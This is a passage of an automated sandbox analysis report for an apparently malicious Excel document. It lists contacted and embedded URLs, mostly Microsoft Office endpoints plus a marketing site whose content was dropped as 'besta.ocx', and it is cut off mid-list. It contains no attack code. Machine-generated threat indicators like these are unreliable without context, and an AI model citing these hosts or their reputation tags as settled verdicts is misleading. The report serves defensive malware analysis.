                    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileedEXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                      high
                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, EXCEL.EXE, 00000000.00000003.504997162.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765835607.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620203784.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637145469.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496692070.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.578892329.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.305119965.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576335404.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301230323.000000000F971000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.616873186.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755525188.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580420279.000000000F970000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303145837.000000000F971000.00000004.00000001.sdmpfalse
                        high
                        https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svgbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digiP0UY3TPH.htm.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://s.w.org/images/core/emoji/13.1.0/svg/1f609.svgEXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                          high
                          https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://tasks.office.comEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                            high
                            https://o365auditrealtimeingestion.manage.office.comPEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://store.office.cn/addinstemplate7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                            • URL Reputation: safe
                            unknown
                            https://login.windows.net/common/oauth2/authorize&EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                              high
                              https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpfalse
                                high
                                https://vendes.marketing/wp-content/uploads/2021/10/figma.svgbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                  high
                                  https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.2besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.odwebp.svc.ms7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://loki.delve.office.com/api/v1/configuration/officewin32/#EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                    high
                                    https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-ebesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://graph.windows.net7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                      high
                                      https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                        high
                                        https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2Fbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://vendes.marketing/wp-content/uploads/2021/10/elementor.svgbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                          high
                                          http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                            high
                                            https://vendes.marketing/wp-content/uploads/images/caso-exito1.pngEXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                              high
                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                high
                                                https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://login.windows.net/common/oauth2/authorizecEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://login.windows.net/common/oauth2/authorizeeEXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/P0UY3TPH.htm.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://asgsmsproxyapi.azurewebsites.net/?EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://o365auditrealtimeingestion.manage.office.com7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                        high
                                                        https://vendes.marketing/wp-content/uploads/2021/10/anuncios.pngP0UY3TPH.htm.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://outlook.office365.com/api/v1.0/me/Activities7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                            high
                                                            https://login.windows.net/common/oauth2/authorize_EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                                                                unknown
                                                                https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://www.odwebp.svc.msomEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
                                                                    unknown
                                                                    https://clients.config.office.net/user/v1.0/android/policies7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                                                                      high
                                                                      https://login.windows.net/common/oauth2/authorizeREXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 